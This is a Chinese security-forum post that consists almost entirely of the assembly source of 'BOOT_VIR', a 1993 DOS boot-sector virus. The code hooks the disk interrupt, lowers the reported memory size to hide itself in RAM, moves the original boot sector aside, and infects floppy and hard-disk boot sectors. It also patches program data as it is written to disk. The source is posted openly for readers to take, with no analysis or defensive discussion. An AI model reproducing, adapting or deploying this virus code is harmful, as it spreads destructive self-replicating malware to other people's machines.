|
作者: mmzz321 [mmzz321] 论坛用户 | 登录 |
BOOT_VIR病毒源代码 ;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 ;圹 圹 ;圹 BOOT_VIR 圹 ;圹 圹 ;圹 Created: 9-Jul-93 Comments by Mike M. 圹 ;圹 圹 ;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 Int60_Offset equ 180h Int60_Segment equ 182h main_ram_size_ equ 413h d_0000_07B4_e equ 7B4h ;* seg_a segment byte public assume cs:seg_a, ds:seg_a org 0 boot_vir proc far start: nop nop nop cli xor ax,ax mov ds,ax mov ss,ax mov sp,7C00h mov si,sp sti mov ax,ds:main_ram_size_ dec ax mov ds:main_ram_size_,ax mov cl,6 shl ax,cl push ax mov es,ax mov cx,200h xor di,di dep movsb mov ax,2Eh push ax retf SectorNum db 2 ; Location Cylinder db 27h ; of original Drive db 0 ; boot sector Side db 0 ; on infected disk boot_vir endp ;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 ; SUBROUTINE ;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 main proc near mov ax,word ptr ds:[4Ch] mov word ptr ds:[180h],ax mov ax,word ptr ds:[4Eh] mov word ptr ds:[182h],ax cli mov ax,78h mov word ptr ds:[4Ch],ax mov word ptr ds:[4Eh],es mov word ptr ds:[188h],ax mov word ptr ds:[18Ah],es mov byte ptr ds:[187h],0EAh sti push ds push cs pop ds mov cx,word ptr SectorNum mov dx,word ptr Drive cmp Drive,0 jne loc_006D push dx push cx xor bx,bx call sub_019F pop cx pop dx loc_006D: mov ax,201h pop es mov bx,sp push es push bx int 60h ; original Int 13h retf main endp ;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 ; SUBROUTINE ;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 In13_Handler proc near cmp ah,2 jne loc_00B9 cmp dl,80h jae loc_008A cmp ch,1 ja loc_008A call sub_00CF loc_008A: cmp cx,1 jne loc_00CA cmp dh,0 jne loc_00CA int 60h ; original Int 13h jnc loc_009B loc_ret_0098: retf 2 loc_009B: cmp word ptr es:[bx],9090h jne loc_ret_0098 push dx push cx push ax pushf mov ax,201h mov cx,es:[bx+2Ah] mov dx,es:[bx+2Ch] int 60h ; original Int 13h popf pop ax pop cx pop dx jmp short loc_ret_0098 loc_00B9: cmp ah,3 jne loc_00CA cmp al,2 jb loc_00CA cmp dl,80h jae loc_00CA call sub_0140 loc_00CA: int 60h ; original Int 13h retf 2 In13_Handler endp ;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 ; SUBROUTINE ;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 sub_00CF proc near push es push ax push bx push cx push dx mov al,1 mov cx,1 mov dh,0 int 60h ; original Int 13h jc loc_011D cmp word ptr es:[bx],9090h je loc_011D mov ax,es:[bx+13h] push dx xor dx,dx div word ptr es:[bx+18h] shr ax,1 dec al pop dx mov dh,0 mov cl,2 mov ch,al mov ax,301h int 60h ; original Int 13h jc loc_011D mov cs:Cylinder,ch mov word ptr cs:Drive,0 xor bx,bx push cs pop es mov ax,301h mov cx,1 mov dh,0 int 60h ; original Int 13h loc_011D: call sub_0126 pop dx pop cx pop bx pop ax pop es retn sub_00CF endp ;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 ; SUBROUTINE ;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 sub_0126 proc near push ds xor bx,bx mov ds,bx mov bx,d_0000_07B4_e cmp word ptr [bx],78h jne loc_013E cli mov word ptr [bx],1187h mov word ptr [bx+2],0FF00h sti loc_013E: pop ds retn sub_0126 endp ;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 ; SUBROUTINE ;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 sub_0140 proc near cmp byte ptr es:[bx],0E9h jne loc_ret_016B cmp word ptr es:[bx+1],5000h jb loc_ret_016B push ds push si push di push cx mov di,bx push cs pop ds xor si,si mov cx,200h rep movsb mov byte ptr es:[bx],0E9h mov word ptr es:[bx+1],169h pop cx pop di pop si pop ds loc_ret_016B: retn sub_0140 endp ;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 ; SUBROUTINE ;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 sub_016C proc near call sub_016F ;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 sub_016F: pop bx push cs pop es sub bx,16Fh mov byte ptr cs:[bx],90h mov word ptr cs:[bx+1],9090h xor ax,ax mov ds,ax cmp word ptr ds:d_0000_07B4_e,1187h je loc_019B les di,dword ptr ds:d_0000_07B4_e mov ds:Int60_Offset,di mov ds:Int60_Segment,es call sub_019F loc_019B: mov ah,4Ch int 21h ;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 sub_019F: mov ax,201h push bx push ax mov cx,1 mov dx,80h add bx,200h int 60h ; original Int 13h pop ax jc loc_01D4 cmp word ptr es:[bx],9090h je loc_01D4 inc ah push ax inc cl int 60h ; original Int 13h pop ax jc loc_01D4 pop bx mov byte ptr es:[bx+2Ch],80h mov byte ptr es:[bx+2Bh],0 dec cl int 60h ; original Int 13h retn loc_01D4: pop bx retn sub_016C endp db 40 dup (90h) db 55h,0AAh seg_a ends end start |
地主 发表时间: 05-04-24 19:31 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号